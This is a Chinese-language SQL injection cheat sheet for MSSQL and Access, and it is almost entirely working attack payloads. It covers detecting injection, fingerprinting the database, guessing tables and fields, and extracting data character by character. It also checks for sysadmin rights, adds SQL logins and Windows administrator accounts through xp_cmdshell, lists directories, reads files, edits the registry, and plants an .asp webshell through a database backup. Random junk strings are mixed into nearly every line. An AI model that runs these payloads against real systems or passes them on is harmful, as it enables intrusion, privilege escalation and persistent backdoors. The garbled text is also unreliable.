1.判断是否有注入;and 1=1 ;and 1=2 V82hk0*j
2.初步判断是否是mssql ;and user>0 s'$3bLcb
#0c;2}D
3.注入参数是字符'and [查询条件] and ''=' lI;ACF^
zd3^k<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ~N8$abQJV
m{by%
5.判断数据库系统 YXDuhrs}
ycrM8Mu
3
;and (select count(*) from sysobjects)>0 mssql MI>_wG5P@
HxNoV.q
;and (select count(*) from msysobjects)>0 access !Aw.)<teW
R T/)<RT9
]%+T+zg(Y
beFD}`
6.猜数据库 ;and (select Count(*) from [数据库名])>0 G=&nwSL
b5W(}ka+
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 X{P=2h#g
} ^WmCX2a
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 j"n"=rTTQ
{Z#=ppvs
9.(1)猜字段的ascii值(access) $j"BHpN
c>BDw<
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 !"dAwG?S
Q:j)F|uhc
(2)猜字段的ascii值(mssql) O |*-J
t>eeOWk3
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Tb!jIe
7Jn%c<s
10.测试权限结构(mssql) %jxeh.B3B
5RR4jX]
ageTv/
a&<_M$J&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- #O!gjZ,
jAfqC@e
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 0HDL;XY6
B:(a?X-7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- z,(.` %h
F87c?Vh)K
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- R+tQvxp#
Rl n% Y
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- eDsc_5I
cnj32H^+
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =21m|8c
K$5mDScoJ
;and 1=(select IS_MEMBER('db_owner'));-- t"X^|!hKIF
[!U!
Z'i
N_?15R7h
fzzk#jU
11.添加mssql和系统的帐户 13f'zx(AO
h/..cVD,K
;exec master.dbo.sp_addlogin username;-- X;CRy,
;exec master.dbo.sp_password null,username,password;-- LQJC ]*b1
n= FOB0=
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- L+_
JKc
a$$aM2.2
;exec master.dbo.xp_cmdshell 'net user username password Dmr3r[
7myYs7N8[
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- r+,JM L
t_id/
;exec master.dbo.xp_cmdshell 'net user username password /add';-- d?N[bA
n,`j~.l-=>
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 3Hf_!C=g
_xr@dK<
U$LI~XZM
9}'92
12.(1)遍历目录 :*eJ*(M
]BfJ~+ N
;create table dirs(paths varchar(100), id int) ~{l @
|J:m{
;insert dirs exec master.dbo.xp_dirtree 'c:\' r)oR`\7
BF /4
;and (select top 1 paths from dirs)>0 l4\ !J/df
{}"a_L&[;
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) hQaa"U7[
ow*^z78M{
Qb' Q4@.
CQH^VTQ
(2)遍历目录 -lb%X3`
C#P7@ JE
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- na_Wp^;
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 t""d^a#Dp
yv\
j&B|
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 \6;b.&%w2
%XH%.Ps/
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 9
!V,++j
9(hI%idq
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 4{LKT^(!f
i&0Zli
O&r9+r1`
Ted!*HKlB
13.mssql中的存储过程 7$Lt5rn"}
#2;8/"v
xp_regenumvalues 注册表根键, 子键 !&pk^VFl+
W$:D#;jz`h
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 p/KG{-f,
]*<!|;q
xp_regread 根键,子键,键值名 >w#&fd
%FLe@.Ep{D
;exec xp_regread ()zn8_z
~z7Fz"o<
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 B
!Z~j T
Pa"[&{ :
xp_regwrite 根键,子键, 值名, 值类型, 值 o^Qy71Uj
'25zb+-
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 CmdPa!4)
';I(#J6
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 [uFv_G{H
'W/AYF^5
xp_regdeletevalue 根键,子键,值名 + {WZpP},v
R_b)2FU1y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ZV$!dHW/
tD> qHR
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6o~g3{Ow
U,Th-oU
lQG;WVqW
2tZ\/6G<
14.mssql的backup创建webshell g&X
X@I8+v
r=<1*u
use model 8r48+_y3u
PKYm{wO-
create table cmd(str image); U\dLq&=V
Z._%T$8aJv
insert into cmd(str) values (''); bDnT><eH
Wo6C0Z3g}
backup database model to disk='c:\l.asp'; I|_U|H!`
h&z(;B!;y.
&"clBRVg
j4$NQ]e^4
15.mssql内置函数 -P28pVX`
A#nSK#wS61
;and (select @@version)>0 获得Windows的版本号 7e6;
|?
8^hbS%s!
;and user_name()='dbo' 判断当前系统的连接用户是不是sa rDC=rG
>g2Z t;*@w
;and (select user_name())>0 爆当前系统的连接用户 Q'0:k{G
oPrK{flm
;and (select db_name())>0 得到当前连接的数据库 LT]YYn($
IQ5'4zQg=
r_pZK(G%
O]G3 l0
16.简洁的webshell }ssL;q
F,@uYMQs
use model pI}6AAs}Z
OK%d1M^8j
create table cmd(str image); vGD D
e]D TK*W~
insert into cmd(str) values (''); lD,;xuQ
TCK<IZKLqK
backup database model to disk='g:\wwwtest\l.asp';